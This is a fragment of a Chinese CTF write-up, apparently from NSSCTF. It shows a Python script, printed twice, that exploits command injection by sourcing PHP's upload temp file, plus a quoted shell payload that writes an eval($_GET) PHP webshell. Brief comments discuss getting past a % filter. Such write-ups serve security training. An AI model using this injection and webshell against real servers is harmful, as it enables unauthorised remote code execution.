加载中...
法三:
执行php临时文件
import requests url= 'http://node7.anna.nssctf.cn:22582/?url=.%20/tmp/ph???????' ## hack.txt内容 # #!/bin/sh # echo "<?php eval(\$_GET['wz']);?>" > hack.php file_path = 'D:\\python_code\\hack.txt' # 要上传的文件路径 files = {'file': open(file_path, 'rb')} response = requests.post(url, files=files) print(f"响应内容: {response.text}") files['file'].close()
import requests url= 'http://node7.anna.nssctf.cn:22582/?url=.%20/tmp/ph???????' ## hack.txt内容 # #!/bin/sh # echo "<?php eval(\$_GET['wz']);?>" > hack.php file_path = 'D:\\python_code\\hack.txt' # 要上传的文件路径 files = {'file': open(file_path, 'rb')} response = requests.post(url, files=files) print(f"响应内容: {response.text}") files['file'].close()
%不是被过滤了吗
过滤的是%这个ASCII值,这里面%是代表url code
法三:
执行php临时文件
%不是被过滤了吗